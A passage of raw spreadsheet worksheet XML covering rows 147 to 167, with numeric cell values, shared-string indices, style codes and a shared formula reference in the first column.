      <c r="AC147" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE147" s="8"/>
      <c r="AF147" s="14"/>
    </row>
    <row r="148">
      <c r="A148" s="6">
        <f t="shared" si="1"/>
        <v>0.8241686548</v>
      </c>
      <c r="B148" s="6">
        <v>6.5945357E7</v>
      </c>
      <c r="C148" s="6">
        <v>1.0</v>
      </c>
      <c r="D148" s="7"/>
      <c r="E148" s="8"/>
      <c r="F148" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G148" s="8"/>
      <c r="H148" s="6">
        <v>1.0</v>
      </c>
      <c r="I148" s="6">
        <v>236.0</v>
      </c>
      <c r="J148" s="17"/>
      <c r="K148" s="17"/>
      <c r="L148" s="17"/>
      <c r="M148" s="17"/>
      <c r="N148" s="17"/>
      <c r="O148" s="4" t="s">
        <v>530</v>
      </c>
      <c r="P148" s="4" t="s">
        <v>531</v>
      </c>
      <c r="Q148" s="6">
        <v>1.3185906E7</v>
      </c>
      <c r="R148" s="7"/>
      <c r="S148" s="6">
        <v>1.3185906E7</v>
      </c>
      <c r="T148" s="7"/>
      <c r="U148" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V148" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W148" s="2" t="s">
        <v>532</v>
      </c>
      <c r="X148" s="6">
        <v>0.0</v>
      </c>
      <c r="Y148" s="6">
        <v>0.0</v>
      </c>
      <c r="Z148" s="7"/>
      <c r="AA148" s="7"/>
      <c r="AB148" s="7"/>
      <c r="AC148" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE148" s="8"/>
      <c r="AF148" s="15"/>
    </row>
    <row r="149">
      <c r="A149" s="6">
        <f t="shared" si="1"/>
        <v>0.1413133022</v>
      </c>
      <c r="B149" s="6">
        <v>2.7260907E7</v>
      </c>
      <c r="C149" s="6">
        <v>1.0</v>
      </c>
      <c r="D149" s="8"/>
      <c r="E149" s="8"/>
      <c r="F149" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G149" s="8"/>
      <c r="H149" s="6">
        <v>2.0</v>
      </c>
      <c r="I149" s="6">
        <v>3326.0</v>
      </c>
      <c r="J149" s="17"/>
      <c r="K149" s="17"/>
      <c r="L149" s="17"/>
      <c r="M149" s="17"/>
      <c r="N149" s="17"/>
      <c r="O149" s="4" t="s">
        <v>533</v>
      </c>
      <c r="P149" s="4" t="s">
        <v>534</v>
      </c>
      <c r="Q149" s="6">
        <v>3149548.0</v>
      </c>
      <c r="R149" s="7"/>
      <c r="S149" s="6">
        <v>607407.0</v>
      </c>
      <c r="T149" s="7"/>
      <c r="U149" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V149" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W149" s="2" t="s">
        <v>535</v>
      </c>
      <c r="X149" s="6">
        <v>2.0</v>
      </c>
      <c r="Y149" s="6">
        <v>1.0</v>
      </c>
      <c r="Z149" s="6">
        <v>0.0</v>
      </c>
      <c r="AA149" s="7"/>
      <c r="AB149" s="7"/>
      <c r="AC149" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE149" s="8"/>
      <c r="AF149" s="15"/>
    </row>
    <row r="150">
      <c r="A150" s="6">
        <f t="shared" si="1"/>
        <v>0.05014202113</v>
      </c>
      <c r="B150" s="6">
        <v>3.862692E7</v>
      </c>
      <c r="C150" s="6">
        <v>1.0</v>
      </c>
      <c r="D150" s="6">
        <v>3.8626967E7</v>
      </c>
      <c r="E150" s="8"/>
      <c r="F150" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G150" s="8"/>
      <c r="H150" s="6">
        <v>0.0</v>
      </c>
      <c r="I150" s="6">
        <v>752.0</v>
      </c>
      <c r="J150" s="17"/>
      <c r="K150" s="17"/>
      <c r="L150" s="17"/>
      <c r="M150" s="17"/>
      <c r="N150" s="17"/>
      <c r="O150" s="4" t="s">
        <v>536</v>
      </c>
      <c r="P150" s="4" t="s">
        <v>537</v>
      </c>
      <c r="Q150" s="6">
        <v>5065860.0</v>
      </c>
      <c r="R150" s="7"/>
      <c r="S150" s="6">
        <v>-1.0</v>
      </c>
      <c r="T150" s="7"/>
      <c r="U150" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V150" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W150" s="2" t="s">
        <v>538</v>
      </c>
      <c r="X150" s="6">
        <v>2.0</v>
      </c>
      <c r="Y150" s="6">
        <v>0.0</v>
      </c>
      <c r="Z150" s="7"/>
      <c r="AA150" s="7"/>
      <c r="AB150" s="7"/>
      <c r="AC150" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE150" s="7"/>
      <c r="AF150" s="15"/>
    </row>
    <row r="151">
      <c r="A151" s="6">
        <f t="shared" si="1"/>
        <v>0.09583558967</v>
      </c>
      <c r="B151" s="6">
        <v>5.4643523E7</v>
      </c>
      <c r="C151" s="6">
        <v>1.0</v>
      </c>
      <c r="D151" s="8"/>
      <c r="E151" s="8"/>
      <c r="F151" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G151" s="8"/>
      <c r="H151" s="6">
        <v>0.0</v>
      </c>
      <c r="I151" s="6">
        <v>273.0</v>
      </c>
      <c r="J151" s="20"/>
      <c r="K151" s="20"/>
      <c r="L151" s="20"/>
      <c r="M151" s="20"/>
      <c r="N151" s="20"/>
      <c r="O151" s="4" t="s">
        <v>539</v>
      </c>
      <c r="P151" s="4" t="s">
        <v>540</v>
      </c>
      <c r="Q151" s="6">
        <v>1.027811E7</v>
      </c>
      <c r="R151" s="8"/>
      <c r="S151" s="6">
        <v>4685471.0</v>
      </c>
      <c r="T151" s="8"/>
      <c r="U151" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V151" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W151" s="2" t="s">
        <v>541</v>
      </c>
      <c r="X151" s="6">
        <v>1.0</v>
      </c>
      <c r="Y151" s="6">
        <v>1.0</v>
      </c>
      <c r="Z151" s="8"/>
      <c r="AA151" s="8"/>
      <c r="AB151" s="8"/>
      <c r="AC151" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE151" s="8"/>
      <c r="AF151" s="14"/>
    </row>
    <row r="152">
      <c r="A152" s="6">
        <f t="shared" si="1"/>
        <v>0.5218930887</v>
      </c>
      <c r="B152" s="6">
        <v>7.0772639E7</v>
      </c>
      <c r="C152" s="6">
        <v>1.0</v>
      </c>
      <c r="D152" s="8"/>
      <c r="E152" s="8"/>
      <c r="F152" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G152" s="8"/>
      <c r="H152" s="6">
        <v>1.0</v>
      </c>
      <c r="I152" s="6">
        <v>169.0</v>
      </c>
      <c r="J152" s="20"/>
      <c r="K152" s="20"/>
      <c r="L152" s="20"/>
      <c r="M152" s="20"/>
      <c r="N152" s="20"/>
      <c r="O152" s="4" t="s">
        <v>542</v>
      </c>
      <c r="P152" s="4" t="s">
        <v>543</v>
      </c>
      <c r="Q152" s="6">
        <v>862945.0</v>
      </c>
      <c r="R152" s="8"/>
      <c r="S152" s="8"/>
      <c r="T152" s="8"/>
      <c r="U152" s="8"/>
      <c r="V152" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W152" s="2" t="s">
        <v>544</v>
      </c>
      <c r="X152" s="6">
        <v>2.0</v>
      </c>
      <c r="Y152" s="6">
        <v>0.0</v>
      </c>
      <c r="Z152" s="8"/>
      <c r="AA152" s="8"/>
      <c r="AB152" s="8"/>
      <c r="AC152" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE152" s="8"/>
      <c r="AF152" s="14"/>
    </row>
    <row r="153">
      <c r="A153" s="6">
        <f t="shared" si="1"/>
        <v>0.5574670018</v>
      </c>
      <c r="B153" s="6">
        <v>6.8296209E7</v>
      </c>
      <c r="C153" s="6">
        <v>1.0</v>
      </c>
      <c r="D153" s="8"/>
      <c r="E153" s="8"/>
      <c r="F153" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G153" s="8"/>
      <c r="H153" s="6">
        <v>4.0</v>
      </c>
      <c r="I153" s="6">
        <v>160.0</v>
      </c>
      <c r="J153" s="20"/>
      <c r="K153" s="20"/>
      <c r="L153" s="20"/>
      <c r="M153" s="20"/>
      <c r="N153" s="20"/>
      <c r="O153" s="4" t="s">
        <v>545</v>
      </c>
      <c r="P153" s="4" t="s">
        <v>546</v>
      </c>
      <c r="Q153" s="6">
        <v>1.5747544E7</v>
      </c>
      <c r="R153" s="8"/>
      <c r="S153" s="6">
        <v>1.5747544E7</v>
      </c>
      <c r="T153" s="8"/>
      <c r="U153" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V153" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W153" s="2" t="s">
        <v>547</v>
      </c>
      <c r="X153" s="6">
        <v>1.0</v>
      </c>
      <c r="Y153" s="6">
        <v>0.0</v>
      </c>
      <c r="Z153" s="8"/>
      <c r="AA153" s="8"/>
      <c r="AB153" s="8"/>
      <c r="AC153" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE153" s="8"/>
      <c r="AF153" s="14"/>
    </row>
    <row r="154">
      <c r="A154" s="6">
        <f t="shared" si="1"/>
        <v>0.3993558856</v>
      </c>
      <c r="B154" s="6">
        <v>2.9868181E7</v>
      </c>
      <c r="C154" s="6">
        <v>1.0</v>
      </c>
      <c r="D154" s="6">
        <v>2.9868219E7</v>
      </c>
      <c r="E154" s="8"/>
      <c r="F154" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G154" s="8"/>
      <c r="H154" s="6">
        <v>0.0</v>
      </c>
      <c r="I154" s="6">
        <v>58.0</v>
      </c>
      <c r="J154" s="17"/>
      <c r="K154" s="17"/>
      <c r="L154" s="17"/>
      <c r="M154" s="17"/>
      <c r="N154" s="17"/>
      <c r="O154" s="4" t="s">
        <v>548</v>
      </c>
      <c r="P154" s="4" t="s">
        <v>549</v>
      </c>
      <c r="Q154" s="6">
        <v>4189075.0</v>
      </c>
      <c r="R154" s="7"/>
      <c r="S154" s="6">
        <v>4189075.0</v>
      </c>
      <c r="T154" s="7"/>
      <c r="U154" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V154" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W154" s="2" t="s">
        <v>550</v>
      </c>
      <c r="X154" s="6">
        <v>1.0</v>
      </c>
      <c r="Y154" s="6">
        <v>0.0</v>
      </c>
      <c r="Z154" s="6">
        <v>0.0</v>
      </c>
      <c r="AA154" s="7"/>
      <c r="AB154" s="7"/>
      <c r="AC154" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE154" s="8"/>
      <c r="AF154" s="15"/>
    </row>
    <row r="155">
      <c r="A155" s="6">
        <f t="shared" si="1"/>
        <v>0.3677441563</v>
      </c>
      <c r="B155" s="6">
        <v>3445420.0</v>
      </c>
      <c r="C155" s="6">
        <v>1.0</v>
      </c>
      <c r="D155" s="7"/>
      <c r="E155" s="8"/>
      <c r="F155" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G155" s="8"/>
      <c r="H155" s="6">
        <v>2.0</v>
      </c>
      <c r="I155" s="6">
        <v>795.0</v>
      </c>
      <c r="J155" s="17"/>
      <c r="K155" s="17"/>
      <c r="L155" s="17"/>
      <c r="M155" s="17"/>
      <c r="N155" s="17"/>
      <c r="O155" s="4" t="s">
        <v>551</v>
      </c>
      <c r="P155" s="4" t="s">
        <v>552</v>
      </c>
      <c r="Q155" s="6">
        <v>78388.0</v>
      </c>
      <c r="R155" s="7"/>
      <c r="S155" s="7"/>
      <c r="T155" s="7"/>
      <c r="U155" s="8"/>
      <c r="V155" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W155" s="2" t="s">
        <v>553</v>
      </c>
      <c r="X155" s="6">
        <v>1.0</v>
      </c>
      <c r="Y155" s="6">
        <v>0.0</v>
      </c>
      <c r="Z155" s="7"/>
      <c r="AA155" s="7"/>
      <c r="AB155" s="7"/>
      <c r="AC155" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE155" s="8"/>
      <c r="AF155" s="15"/>
    </row>
    <row r="156">
      <c r="A156" s="6">
        <f t="shared" si="1"/>
        <v>0.5686156459</v>
      </c>
      <c r="B156" s="6">
        <v>815220.0</v>
      </c>
      <c r="C156" s="6">
        <v>1.0</v>
      </c>
      <c r="D156" s="6">
        <v>838180.0</v>
      </c>
      <c r="E156" s="8"/>
      <c r="F156" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G156" s="8"/>
      <c r="H156" s="6">
        <v>2.0</v>
      </c>
      <c r="I156" s="6">
        <v>594.0</v>
      </c>
      <c r="J156" s="17"/>
      <c r="K156" s="17"/>
      <c r="L156" s="17"/>
      <c r="M156" s="17"/>
      <c r="N156" s="17"/>
      <c r="O156" s="4" t="s">
        <v>554</v>
      </c>
      <c r="P156" s="4" t="s">
        <v>555</v>
      </c>
      <c r="Q156" s="6">
        <v>91857.0</v>
      </c>
      <c r="R156" s="7"/>
      <c r="S156" s="7"/>
      <c r="T156" s="7"/>
      <c r="U156" s="8"/>
      <c r="V156" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W156" s="2" t="s">
        <v>215</v>
      </c>
      <c r="X156" s="6">
        <v>8.0</v>
      </c>
      <c r="Y156" s="6">
        <v>4.0</v>
      </c>
      <c r="Z156" s="6">
        <v>0.0</v>
      </c>
      <c r="AA156" s="7"/>
      <c r="AB156" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AC156" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE156" s="8"/>
      <c r="AF156" s="15"/>
    </row>
    <row r="157">
      <c r="A157" s="6">
        <f t="shared" si="1"/>
        <v>0.9639263406</v>
      </c>
      <c r="B157" s="6">
        <v>6.4561798E7</v>
      </c>
      <c r="C157" s="6">
        <v>1.0</v>
      </c>
      <c r="D157" s="6">
        <v>6.4562154E7</v>
      </c>
      <c r="E157" s="8"/>
      <c r="F157" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G157" s="8"/>
      <c r="H157" s="6">
        <v>-3.0</v>
      </c>
      <c r="I157" s="6">
        <v>227.0</v>
      </c>
      <c r="J157" s="20"/>
      <c r="K157" s="20"/>
      <c r="L157" s="20"/>
      <c r="M157" s="20"/>
      <c r="N157" s="20"/>
      <c r="O157" s="4" t="s">
        <v>556</v>
      </c>
      <c r="P157" s="4" t="s">
        <v>557</v>
      </c>
      <c r="Q157" s="6">
        <v>1.1644033E7</v>
      </c>
      <c r="R157" s="8"/>
      <c r="S157" s="8"/>
      <c r="T157" s="8"/>
      <c r="U157" s="8"/>
      <c r="V157" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W157" s="2" t="s">
        <v>558</v>
      </c>
      <c r="X157" s="6">
        <v>2.0</v>
      </c>
      <c r="Y157" s="6">
        <v>4.0</v>
      </c>
      <c r="Z157" s="8"/>
      <c r="AA157" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB157" s="8"/>
      <c r="AC157" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE157" s="8"/>
      <c r="AF157" s="14"/>
    </row>
    <row r="158">
      <c r="A158" s="6">
        <f t="shared" si="1"/>
        <v>0.7387396795</v>
      </c>
      <c r="B158" s="6">
        <v>4.844741E7</v>
      </c>
      <c r="C158" s="6">
        <v>1.0</v>
      </c>
      <c r="D158" s="7"/>
      <c r="E158" s="8"/>
      <c r="F158" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G158" s="8"/>
      <c r="H158" s="6">
        <v>1.0</v>
      </c>
      <c r="I158" s="6">
        <v>1318.0</v>
      </c>
      <c r="J158" s="17"/>
      <c r="K158" s="17"/>
      <c r="L158" s="17"/>
      <c r="M158" s="17"/>
      <c r="N158" s="17"/>
      <c r="O158" s="4" t="s">
        <v>559</v>
      </c>
      <c r="P158" s="4" t="s">
        <v>560</v>
      </c>
      <c r="Q158" s="6">
        <v>892249.0</v>
      </c>
      <c r="R158" s="7"/>
      <c r="S158" s="6">
        <v>892249.0</v>
      </c>
      <c r="T158" s="7"/>
      <c r="U158" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V158" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W158" s="2" t="s">
        <v>561</v>
      </c>
      <c r="X158" s="6">
        <v>1.0</v>
      </c>
      <c r="Y158" s="6">
        <v>1.0</v>
      </c>
      <c r="Z158" s="7"/>
      <c r="AA158" s="7"/>
      <c r="AB158" s="7"/>
      <c r="AC158" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE158" s="7"/>
      <c r="AF158" s="15"/>
    </row>
    <row r="159">
      <c r="A159" s="6">
        <f t="shared" si="1"/>
        <v>0.7826104179</v>
      </c>
      <c r="B159" s="6">
        <v>2.8343638E7</v>
      </c>
      <c r="C159" s="6">
        <v>1.0</v>
      </c>
      <c r="D159" s="8"/>
      <c r="E159" s="8"/>
      <c r="F159" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G159" s="8"/>
      <c r="H159" s="6">
        <v>0.0</v>
      </c>
      <c r="I159" s="6">
        <v>208.0</v>
      </c>
      <c r="J159" s="20"/>
      <c r="K159" s="20"/>
      <c r="L159" s="20"/>
      <c r="M159" s="20"/>
      <c r="N159" s="20"/>
      <c r="O159" s="4" t="s">
        <v>562</v>
      </c>
      <c r="P159" s="4" t="s">
        <v>563</v>
      </c>
      <c r="Q159" s="6">
        <v>1777328.0</v>
      </c>
      <c r="R159" s="8"/>
      <c r="S159" s="6">
        <v>699695.0</v>
      </c>
      <c r="T159" s="8"/>
      <c r="U159" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V159" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W159" s="2" t="s">
        <v>564</v>
      </c>
      <c r="X159" s="6">
        <v>1.0</v>
      </c>
      <c r="Y159" s="6">
        <v>5.0</v>
      </c>
      <c r="Z159" s="6">
        <v>0.0</v>
      </c>
      <c r="AA159" s="8"/>
      <c r="AB159" s="8"/>
      <c r="AC159" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE159" s="8"/>
      <c r="AF159" s="14"/>
    </row>
    <row r="160">
      <c r="A160" s="6">
        <f t="shared" si="1"/>
        <v>0.7844752414</v>
      </c>
      <c r="B160" s="6">
        <v>2.1499301E7</v>
      </c>
      <c r="C160" s="6">
        <v>1.0</v>
      </c>
      <c r="D160" s="7"/>
      <c r="E160" s="8"/>
      <c r="F160" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G160" s="8"/>
      <c r="H160" s="6">
        <v>2.0</v>
      </c>
      <c r="I160" s="6">
        <v>471.0</v>
      </c>
      <c r="J160" s="17"/>
      <c r="K160" s="17"/>
      <c r="L160" s="17"/>
      <c r="M160" s="17"/>
      <c r="N160" s="17"/>
      <c r="O160" s="4" t="s">
        <v>565</v>
      </c>
      <c r="P160" s="4" t="s">
        <v>566</v>
      </c>
      <c r="Q160" s="6">
        <v>732256.0</v>
      </c>
      <c r="R160" s="7"/>
      <c r="S160" s="7"/>
      <c r="T160" s="7"/>
      <c r="U160" s="8"/>
      <c r="V160" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W160" s="2" t="s">
        <v>567</v>
      </c>
      <c r="X160" s="6">
        <v>0.0</v>
      </c>
      <c r="Y160" s="6">
        <v>6.0</v>
      </c>
      <c r="Z160" s="6">
        <v>0.0</v>
      </c>
      <c r="AA160" s="7"/>
      <c r="AB160" s="7"/>
      <c r="AC160" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE160" s="8"/>
      <c r="AF160" s="15"/>
    </row>
    <row r="161">
      <c r="A161" s="6">
        <f t="shared" si="1"/>
        <v>0.9933630012</v>
      </c>
      <c r="B161" s="6">
        <v>3.2954328E7</v>
      </c>
      <c r="C161" s="6">
        <v>1.0</v>
      </c>
      <c r="D161" s="7"/>
      <c r="E161" s="8"/>
      <c r="F161" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G161" s="8"/>
      <c r="H161" s="6">
        <v>3.0</v>
      </c>
      <c r="I161" s="6">
        <v>51.0</v>
      </c>
      <c r="J161" s="17"/>
      <c r="K161" s="17"/>
      <c r="L161" s="17"/>
      <c r="M161" s="17"/>
      <c r="N161" s="17"/>
      <c r="O161" s="4" t="s">
        <v>568</v>
      </c>
      <c r="P161" s="4" t="s">
        <v>569</v>
      </c>
      <c r="Q161" s="6">
        <v>4228664.0</v>
      </c>
      <c r="R161" s="7"/>
      <c r="S161" s="6">
        <v>18771.0</v>
      </c>
      <c r="T161" s="7"/>
      <c r="U161" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V161" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W161" s="2" t="s">
        <v>570</v>
      </c>
      <c r="X161" s="6">
        <v>1.0</v>
      </c>
      <c r="Y161" s="6">
        <v>4.0</v>
      </c>
      <c r="Z161" s="7"/>
      <c r="AA161" s="7"/>
      <c r="AB161" s="7"/>
      <c r="AC161" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE161" s="8"/>
      <c r="AF161" s="15"/>
    </row>
    <row r="162">
      <c r="A162" s="6">
        <f t="shared" si="1"/>
        <v>0.4285995228</v>
      </c>
      <c r="B162" s="6">
        <v>3.2736016E7</v>
      </c>
      <c r="C162" s="6">
        <v>1.0</v>
      </c>
      <c r="D162" s="8"/>
      <c r="E162" s="8"/>
      <c r="F162" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G162" s="8"/>
      <c r="H162" s="6">
        <v>-1.0</v>
      </c>
      <c r="I162" s="6">
        <v>44.0</v>
      </c>
      <c r="J162" s="20"/>
      <c r="K162" s="20"/>
      <c r="L162" s="20"/>
      <c r="M162" s="20"/>
      <c r="N162" s="20"/>
      <c r="O162" s="4" t="s">
        <v>571</v>
      </c>
      <c r="P162" s="4" t="s">
        <v>572</v>
      </c>
      <c r="Q162" s="6">
        <v>3943797.0</v>
      </c>
      <c r="R162" s="8"/>
      <c r="S162" s="6">
        <v>1530814.0</v>
      </c>
      <c r="T162" s="8"/>
      <c r="U162" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V162" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W162" s="2" t="s">
        <v>573</v>
      </c>
      <c r="X162" s="6">
        <v>1.0</v>
      </c>
      <c r="Y162" s="6">
        <v>1.0</v>
      </c>
      <c r="Z162" s="8"/>
      <c r="AA162" s="8"/>
      <c r="AB162" s="8"/>
      <c r="AC162" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE162" s="8"/>
      <c r="AF162" s="14"/>
    </row>
    <row r="163">
      <c r="A163" s="6">
        <f t="shared" si="1"/>
        <v>0.998250606</v>
      </c>
      <c r="B163" s="6">
        <v>3.5661927E7</v>
      </c>
      <c r="C163" s="6">
        <v>1.0</v>
      </c>
      <c r="D163" s="6">
        <v>3.5664968E7</v>
      </c>
      <c r="E163" s="8"/>
      <c r="F163" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G163" s="8"/>
      <c r="H163" s="6">
        <v>0.0</v>
      </c>
      <c r="I163" s="6">
        <v>123.0</v>
      </c>
      <c r="J163" s="17"/>
      <c r="K163" s="17"/>
      <c r="L163" s="17"/>
      <c r="M163" s="17"/>
      <c r="N163" s="17"/>
      <c r="O163" s="4" t="s">
        <v>574</v>
      </c>
      <c r="P163" s="4" t="s">
        <v>575</v>
      </c>
      <c r="Q163" s="6">
        <v>5360025.0</v>
      </c>
      <c r="R163" s="7"/>
      <c r="S163" s="7"/>
      <c r="T163" s="7"/>
      <c r="U163" s="8"/>
      <c r="V163" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W163" s="2" t="s">
        <v>576</v>
      </c>
      <c r="X163" s="6">
        <v>1.0</v>
      </c>
      <c r="Y163" s="6">
        <v>1.0</v>
      </c>
      <c r="Z163" s="7"/>
      <c r="AA163" s="7"/>
      <c r="AB163" s="7"/>
      <c r="AC163" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE163" s="8"/>
      <c r="AF163" s="15"/>
    </row>
    <row r="164">
      <c r="A164" s="6">
        <f t="shared" si="1"/>
        <v>0.3865183635</v>
      </c>
      <c r="B164" s="6">
        <v>4.1749338E7</v>
      </c>
      <c r="C164" s="6">
        <v>1.0</v>
      </c>
      <c r="D164" s="8"/>
      <c r="E164" s="8"/>
      <c r="F164" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G164" s="8"/>
      <c r="H164" s="6">
        <v>0.0</v>
      </c>
      <c r="I164" s="6">
        <v>153.0</v>
      </c>
      <c r="J164" s="20"/>
      <c r="K164" s="20"/>
      <c r="L164" s="20"/>
      <c r="M164" s="20"/>
      <c r="N164" s="20"/>
      <c r="O164" s="4" t="s">
        <v>577</v>
      </c>
      <c r="P164" s="4" t="s">
        <v>578</v>
      </c>
      <c r="Q164" s="6">
        <v>650654.0</v>
      </c>
      <c r="R164" s="8"/>
      <c r="S164" s="8"/>
      <c r="T164" s="8"/>
      <c r="U164" s="8"/>
      <c r="V164" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W164" s="2" t="s">
        <v>579</v>
      </c>
      <c r="X164" s="6">
        <v>1.0</v>
      </c>
      <c r="Y164" s="6">
        <v>0.0</v>
      </c>
      <c r="Z164" s="8"/>
      <c r="AA164" s="8"/>
      <c r="AB164" s="8"/>
      <c r="AC164" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE164" s="8"/>
      <c r="AF164" s="14"/>
    </row>
    <row r="165">
      <c r="A165" s="6">
        <f t="shared" si="1"/>
        <v>0.9182175043</v>
      </c>
      <c r="B165" s="6">
        <v>9957562.0</v>
      </c>
      <c r="C165" s="6">
        <v>1.0</v>
      </c>
      <c r="D165" s="8"/>
      <c r="E165" s="8"/>
      <c r="F165" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G165" s="8"/>
      <c r="H165" s="6">
        <v>0.0</v>
      </c>
      <c r="I165" s="6">
        <v>129.0</v>
      </c>
      <c r="J165" s="20"/>
      <c r="K165" s="20"/>
      <c r="L165" s="20"/>
      <c r="M165" s="20"/>
      <c r="N165" s="20"/>
      <c r="O165" s="4" t="s">
        <v>580</v>
      </c>
      <c r="P165" s="4" t="s">
        <v>581</v>
      </c>
      <c r="Q165" s="6">
        <v>256007.0</v>
      </c>
      <c r="R165" s="8"/>
      <c r="S165" s="6">
        <v>256007.0</v>
      </c>
      <c r="T165" s="8"/>
      <c r="U165" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V165" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W165" s="2" t="s">
        <v>582</v>
      </c>
      <c r="X165" s="6">
        <v>1.0</v>
      </c>
      <c r="Y165" s="6">
        <v>1.0</v>
      </c>
      <c r="Z165" s="8"/>
      <c r="AA165" s="8"/>
      <c r="AB165" s="8"/>
      <c r="AC165" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE165" s="8"/>
      <c r="AF165" s="14"/>
    </row>
    <row r="166">
      <c r="A166" s="6">
        <f t="shared" si="1"/>
        <v>0.303295012</v>
      </c>
      <c r="B166" s="6">
        <v>1.2355943E7</v>
      </c>
      <c r="C166" s="6">
        <v>1.0</v>
      </c>
      <c r="D166" s="6">
        <v>1.2356035E7</v>
      </c>
      <c r="E166" s="8"/>
      <c r="F166" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G166" s="8"/>
      <c r="H166" s="6">
        <v>0.0</v>
      </c>
      <c r="I166" s="6">
        <v>120.0</v>
      </c>
      <c r="J166" s="20"/>
      <c r="K166" s="20"/>
      <c r="L166" s="20"/>
      <c r="M166" s="20"/>
      <c r="N166" s="20"/>
      <c r="O166" s="4" t="s">
        <v>583</v>
      </c>
      <c r="P166" s="4" t="s">
        <v>584</v>
      </c>
      <c r="Q166" s="6">
        <v>962026.0</v>
      </c>
      <c r="R166" s="8"/>
      <c r="S166" s="6">
        <v>3366929.0</v>
      </c>
      <c r="T166" s="8"/>
      <c r="U166" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V166" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W166" s="2" t="s">
        <v>585</v>
      </c>
      <c r="X166" s="6">
        <v>3.0</v>
      </c>
      <c r="Y166" s="6">
        <v>2.0</v>
      </c>
      <c r="Z166" s="8"/>
      <c r="AA166" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB166" s="8"/>
      <c r="AC166" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE166" s="8"/>
      <c r="AF166" s="14"/>
    </row>
    <row r="167">
      <c r="A167" s="6">
        <f t="shared" si="1"/>
        <v>0.4996360701</v>
      </c>
      <c r="B167" s="6">
        <v>3462303.0</v>
      </c>
      <c r="C167" s="6">
        <v>1.0</v>
      </c>
      <c r="D167" s="6">
        <v>3463616.0</v>
      </c>
      <c r="E167" s="8"/>
      <c r="F167" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G167" s="8"/>
      <c r="H167" s="6">
        <v>2.0</v>
      </c>
      <c r="I167" s="6">
        <v>324.0</v>
      </c>
      <c r="J167" s="17"/>
      <c r="K167" s="17"/>
      <c r="L167" s="17"/>
      <c r="M167" s="17"/>
      <c r="N167" s="17"/>
      <c r="O167" s="4" t="s">
        <v>586</v>
      </c>
      <c r="P167" s="4" t="s">
        <v>587</v>
      </c>
      <c r="Q167" s="6">
        <v>10093.0</v>
      </c>
      <c r="R167" s="7"/>
      <c r="S167" s="7"/>
      <c r="T167" s="7"/>
      <c r="U167" s="8"/>
      <c r="V167" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W167" s="2" t="s">
        <v>588</v>
      </c>
      <c r="X167" s="6">
        <v>1.0</v>
      </c>
      <c r="Y167" s="6">
        <v>0.0</v>
      </c>
      <c r="Z167" s="7"/>
      <c r="AA167" s="7"/>
      <c r="AB167" s="7"/>
      <c r="AC167" s="2" t="s">
        <v>51</v>
